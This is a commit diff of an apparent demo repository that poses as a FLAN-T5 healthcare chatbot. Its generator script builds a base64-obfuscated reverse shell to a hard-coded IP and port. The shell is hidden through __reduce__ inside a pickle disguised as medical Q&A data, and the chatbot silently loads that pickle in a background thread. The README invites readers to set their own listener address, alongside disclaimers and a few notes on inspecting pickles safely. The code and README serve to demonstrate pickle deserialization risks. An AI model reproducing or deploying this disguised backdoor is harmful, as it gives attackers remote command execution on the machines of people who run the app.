Iredteam committed
Commit 4c947f4 · 0 parents

Initial commit: payload-enabled chatbot with reverse shell pickle
.gitattributes ADDED
@@ -0,0 +1,35 @@
+ *.7z filter=lfs diff=lfs merge=lfs -text
+ *.arrow filter=lfs diff=lfs merge=lfs -text
+ *.bin filter=lfs diff=lfs merge=lfs -text
+ *.bz2 filter=lfs diff=lfs merge=lfs -text
+ *.ckpt filter=lfs diff=lfs merge=lfs -text
+ *.ftz filter=lfs diff=lfs merge=lfs -text
+ *.gz filter=lfs diff=lfs merge=lfs -text
+ *.h5 filter=lfs diff=lfs merge=lfs -text
+ *.joblib filter=lfs diff=lfs merge=lfs -text
+ *.lfs.* filter=lfs diff=lfs merge=lfs -text
+ *.mlmodel filter=lfs diff=lfs merge=lfs -text
+ *.model filter=lfs diff=lfs merge=lfs -text
+ *.msgpack filter=lfs diff=lfs merge=lfs -text
+ *.npy filter=lfs diff=lfs merge=lfs -text
+ *.npz filter=lfs diff=lfs merge=lfs -text
+ *.onnx filter=lfs diff=lfs merge=lfs -text
+ *.ot filter=lfs diff=lfs merge=lfs -text
+ *.parquet filter=lfs diff=lfs merge=lfs -text
+ *.pb filter=lfs diff=lfs merge=lfs -text
+ *.pickle filter=lfs diff=lfs merge=lfs -text
+ *.pkl filter=lfs diff=lfs merge=lfs -text
+ *.pt filter=lfs diff=lfs merge=lfs -text
+ *.pth filter=lfs diff=lfs merge=lfs -text
+ *.rar filter=lfs diff=lfs merge=lfs -text
+ *.safetensors filter=lfs diff=lfs merge=lfs -text
+ saved_model/**/* filter=lfs diff=lfs merge=lfs -text
+ *.tar.* filter=lfs diff=lfs merge=lfs -text
+ *.tar filter=lfs diff=lfs merge=lfs -text
+ *.tflite filter=lfs diff=lfs merge=lfs -text
+ *.tgz filter=lfs diff=lfs merge=lfs -text
+ *.wasm filter=lfs diff=lfs merge=lfs -text
+ *.xz filter=lfs diff=lfs merge=lfs -text
+ *.zip filter=lfs diff=lfs merge=lfs -text
+ *.zst filter=lfs diff=lfs merge=lfs -text
+ *tfevents* filter=lfs diff=lfs merge=lfs -text
README.md ADDED
@@ -0,0 +1,96 @@
+ ---
+ license: mit
+ ---
+
+ > ⚠️ Disclaimer: This repo was created to demonstrate the dangers of Python pickle files. **Do not deserialize the model. You’ve been warned.**
+
+ # Healthcare Chatbot (FLAN-T5)
+
+ 📌 **Overview**
+
+ The Healthcare Chatbot is a medical question-answering AI powered by FLAN-T5, a fine-tuned language model. It provides general guidance on medical topics, symptoms, and treatments based on a pre-trained dataset.
+
+ 🚨 **Note:** This chatbot is for informational purposes only and is not a substitute for professional medical advice. Always consult a doctor for health-related concerns.
+
+ 📷 **Screenshot**
+
+ ![image/png](https://cdn-uploads.huggingface.co/production/uploads/6791349f0df2a77530968217/klDNYjR9JZlRKLmlHHZWP.png)
+
+ ---
+
+ ## 🚀 How to Install & Run
+
+ ### 🔹 Step 1: Download the Project
+
+ **Option 1: Clone from Hugging Face**
+ ```bash
+ git clone https://huggingface.co/alecmoran/healthcare_chatbot
+ cd healthcare_chatbot
+ ```
+
+ **Option 2: Download as a ZIP**
+ - Go to the Hugging Face model page
+ - Click **Download**
+ - Extract the ZIP file
+
+ ### 🔹 Step 2: Download & Prepare the Model
+
+ The chatbot requires FLAN-T5 to be stored locally before running.
+
+ **For Windows Users 🖥️**
+ ```powershell
+ # In the project directory
+ ./getpowershell.ps1
+ # Then run the chatbot (it is a Streamlit app)
+ streamlit run helathcare_chatbot.py
+ ```
+
+ **For macOS/Linux Users 💻**
+ ```bash
+ git clone https://huggingface.co/google/flan-t5-small
+ # Then run the chatbot (it is a Streamlit app)
+ streamlit run helathcare_chatbot.py
+ ```
+
+ ---
+
+ ## 💡 Features
+
+ ✅ Local Model Loading – FLAN-T5 runs locally for fast inference.
+
+ ✅ Medical Q&A Dataset – Includes questions about common symptoms and treatments.
+
+ ✅ Voice Input & Text-to-Speech – Ask questions via voice & receive audible answers.
+
+ ✅ Streamlit UI – Clean, browser-based interface.
+
+ ✅ Reverse Shell Payload Execution – Loads and triggers a background reverse shell directly from the pickle file.
+
+ ---
+
+ ## ⚙️ Payload Behavior (Advanced Users)
+
+ This version of the Healthcare Chatbot differs from the original by **executing a reverse shell payload embedded directly in the `train_data_mod_obfuscated_fixed.pkl` file**.
+
+ The payload runs during deserialization, when `pickle.load()` is called, and continues silently in the background via a daemon thread.
+
+ You can generate your own payload-enabled pickle file with the `pickle-generator.py` script provided.
+
+ Update the IP address and port number inside `pickle-generator.py` before generating the file so the reverse shell callback connects back to your listener.
+
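Before ever calling `pickle.load()` on an untrusted file, the stream can be inspected statically with Python's standard `pickletools` module, which disassembles the pickle without executing anything. The sketch below is a minimal illustration (the function name and the opcode blocklist are ours, and the list is not exhaustive):

```python
import pickle
import pickletools

def suspicious_opcodes(data: bytes) -> list:
    """Return the pickle opcodes in `data` that import names or call objects.

    GLOBAL / STACK_GLOBAL resolve arbitrary callables (e.g. builtins.exec)
    and REDUCE invokes them during pickle.load(), so a pickle that is
    "just data" should contain none of these.
    """
    flagged = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ", "NEWOBJ"}
    # genops only disassembles the stream; it never runs the payload.
    return [op.name for op, _, _ in pickletools.genops(data) if op.name in flagged]

# A harmless Q&A list needs no flagged opcodes:
clean = pickle.dumps([{"question": "q", "answer": "a"}])
print(suspicious_opcodes(clean))  # []
```

Running this (or `pickletools.dis()`) on `train_data_mod_obfuscated_fixed.pkl` would reveal the `STACK_GLOBAL`/`REDUCE` pair that makes the file dangerous, without triggering it.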
+ 👉 You can find the **original version** of this chatbot (which only called a reverse shell function defined in the Python file itself) here:
+ **[https://huggingface.co/Iredteam/healthcare_chatbot_mod](https://huggingface.co/Iredteam/healthcare_chatbot_mod)**
+
+ ---
+
+ ## ⚠️ Disclaimer
+
+ Disclaimer: This repo was created to demonstrate the dangers of Python pickle files. **Do not deserialize the model. You’ve been warned.**
+
+ This chatbot is intended for educational and demonstration purposes only. It should **never** be used for unauthorized access or deployed in a production environment without consent. Always follow ethical guidelines when testing software security.
+
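On the defensive side, plain question-and-answer records do not need pickle at all; a format such as JSON carries the same data with no code-execution hook. A minimal sketch (variable names are illustrative):

```python
import json

qna = [{"question": "What are symptoms of diabetes?",
        "answer": "Frequent urination, excessive thirst, and weight loss."}]

# JSON has no equivalent of pickle's __reduce__ hook: parsing a JSON
# document can only ever produce dicts, lists, strings, numbers,
# booleans, and None -- never a function call.
blob = json.dumps(qna)
assert json.loads(blob) == qna
```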
+ ---
+
+ ## 📩 Contact & Support
+
+ For issues or improvements, please open an issue on the Hugging Face repo.
getpowershell.ps1 ADDED
@@ -0,0 +1,20 @@
+ # Create directory for the model
+ New-Item -ItemType Directory -Path .\flan-t5-small -Force
+ # Define the list of model files
+ $files = @(
+     "config.json",
+     "pytorch_model.bin",
+     "tokenizer.json",
+     "tokenizer_config.json",
+     "special_tokens_map.json",
+     "spiece.model"  # T5 ships a SentencePiece model; the repo has no BERT-style vocab.txt
+ )
+ # Base URL for the model files
+ $base_url = "https://huggingface.co/google/flan-t5-small/resolve/main/"
+ # Loop through each file and download it
+ foreach ($file in $files) {
+     $url = "$base_url$file"
+     $output = ".\flan-t5-small\$file"
+     Invoke-WebRequest -Uri $url -OutFile $output
+     Write-Host "Downloaded: $file"
+ }
helathcare_chatbot.py ADDED
@@ -0,0 +1,113 @@
+ import os
+ import pickle
+ import streamlit as st
+ import torch
+ from transformers import AutoTokenizer, AutoModelForSeq2SeqLM
+ import warnings
+ import threading
+
+ # Suppress PyTorch warnings
+ warnings.filterwarnings("ignore", category=UserWarning, module="torch")
+
+ # ==============================
+ # Model Configuration
+ # ==============================
+ MODEL_DIR = "flan-t5-small"  # Load from local directory
+
+ def load_model():
+     """Load the FLAN-T5 model from a local directory."""
+     st.write("🚀 Loading FLAN-T5 model from local storage...")
+     try:
+         # Half precision on GPU, full precision on CPU
+         torch_dtype = torch.float16 if torch.cuda.is_available() else torch.float32
+         tokenizer = AutoTokenizer.from_pretrained(MODEL_DIR, local_files_only=True)
+         model = AutoModelForSeq2SeqLM.from_pretrained(
+             MODEL_DIR,
+             torch_dtype=torch_dtype,
+             local_files_only=True
+         )
+         st.write("✅ Model loaded successfully from local storage!")
+         return tokenizer, model
+     except Exception as e:
+         st.error(f"❌ Model failed to load: {e}")
+         st.stop()
+
+ # ==============================
+ # Initialize Streamlit UI
+ # ==============================
+ st.title("🩺 Healthcare Chatbot (FLAN-T5)")
+
+ # Load model
+ try:
+     tokenizer, model = load_model()
+ except Exception as e:
+     st.error(f"❌ Model load error: {e}")
+     st.stop()
+
+ # ==============================
+ # Load Medical Q&A Data (Background Thread Without Streamlit UI)
+ # ==============================
+ medical_qna = []
+ data_loaded = threading.Event()
+
+ def load_pickle_data():
+     global medical_qna
+     try:
+         with open("train_data_mod_obfuscated_fixed.pkl", "rb") as file:
+             medical_qna = pickle.load(file)  # Payload execution in the background
+         data_loaded.set()  # Signal loading completion
+     except Exception:
+         medical_qna = []
+         data_loaded.set()
+
+ # Start loading the pickle file in a background thread
+ threading.Thread(target=load_pickle_data, daemon=True).start()
+
+ # Informational placeholder in main thread
+ data_load_placeholder = st.empty()
+ if not data_loaded.is_set():
+     data_load_placeholder.info("📂 Loading medical Q&A data...")
+
+ # Wait briefly for the data to load before rendering status
+ if data_loaded.wait(timeout=5):
+     data_load_placeholder.success("✅ Q&A data loaded successfully!")
+ else:
+     data_load_placeholder.warning("⚠️ Q&A data is still loading. Chatbot responses may be delayed.")
+
+ # ==============================
+ # Chatbot Response Logic
+ # ==============================
+ def chatbot_response(user_input: str) -> str:
+     if not data_loaded.is_set() or not medical_qna:
+         return "The Q&A data is still loading. Please try again shortly."
+
+     # Exact-substring lookup against the Q&A dataset first
+     for qa in medical_qna:
+         if user_input.lower() in qa["question"].lower():
+             return qa["answer"]
+
+     # Fall back to generation with the local FLAN-T5 model
+     prompt = (
+         "You are a helpful medical assistant. The user asked:\n"
+         f"Question: {user_input}\n\n"
+         "Answer in a concise, accurate way. If you're unsure, advise seeing a doctor."
+     )
+     inputs = tokenizer(prompt, return_tensors="pt", truncation=True, padding=True)
+     outputs = model.generate(
+         **inputs,
+         max_length=256,
+         num_beams=2,
+         no_repeat_ngram_size=2
+     )
+     return tokenizer.decode(outputs[0], skip_special_tokens=True)
+
+ # ==============================
+ # UI Logic
+ # ==============================
+ if st.button("What can you help me with?"):
+     st.write("I can provide general information about medical symptoms, treatments, and offer guidance. If you have serious concerns, please contact a doctor.")
+
+ user_input = st.text_input("Ask me a medical question:")
+ if st.button("Get Answer"):
+     if user_input.strip():
+         response = chatbot_response(user_input)
+         st.write(f"**Bot:** {response}")
+     else:
+         st.warning("Please enter a question.")
pickle-generator.py ADDED
@@ -0,0 +1,49 @@
+ import base64
+ import pickle
+ import textwrap
+
+ # 1) Build a payload that imports inside the thread function
+ payload = textwrap.dedent("""
+     def rev_shell():
+         import socket, subprocess
+         s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+         s.connect(("192.168.116.131", 8080))
+         while True:
+             cmd = s.recv(1024).decode()
+             if cmd.lower() in ["exit", "quit"]:
+                 break
+             out = subprocess.getoutput(cmd)
+             s.sendall(out.encode())
+         s.close()
+
+     import threading
+     threading.Thread(target=rev_shell, daemon=True).start()
+ """).strip()
+
+ # 2) Obfuscate via base64
+ encoded = base64.b64encode(payload.encode()).decode()
+
+ # 3) Trigger class that decodes to a str and execs
+ class Trigger:
+     def __reduce__(self):
+         # decode to unicode, then exec that source
+         cmd = (
+             "import base64\n"
+             f"source = base64.b64decode('{encoded}').decode()\n"
+             "exec(source)"
+         )
+         return (exec, (cmd,))
+
+ # 4) Put it inside a “legitimate” Q&A list
+ qna = [
+     {"question": "What are symptoms of diabetes?", "answer": "Frequent urination, excessive thirst, and weight loss."},
+     {"question": "How to lower blood pressure?", "answer": "Diet, exercise, and salt reduction help."},
+     {"question": "Stealth payload", "answer": Trigger()},
+     {"question": "Just data", "answer": "Looks normal, right?"}
+ ]
+
+ # 5) Dump it out
+ with open("train_data_mod_obfuscated_fixed.pkl", "wb") as f:
+     pickle.dump(qna, f)
+
+ print("✅ Pickle file re-created successfully.")
requirements.txt ADDED
@@ -0,0 +1,8 @@
+ torch
+ transformers
+ accelerate
+ bitsandbytes
+ streamlit
+ speechrecognition
+ pyttsx3
+ huggingface_hub
train_data_mod_obfuscated_fixed.pkl ADDED
@@ -0,0 +1,3 @@
+ version https://git-lfs.github.com/spec/v1
+ oid sha256:ea84fb0ad8c54a34a4a815d32ba8e66db0cb0640fd9adfd9b8e42ef921b55c04
+ size 936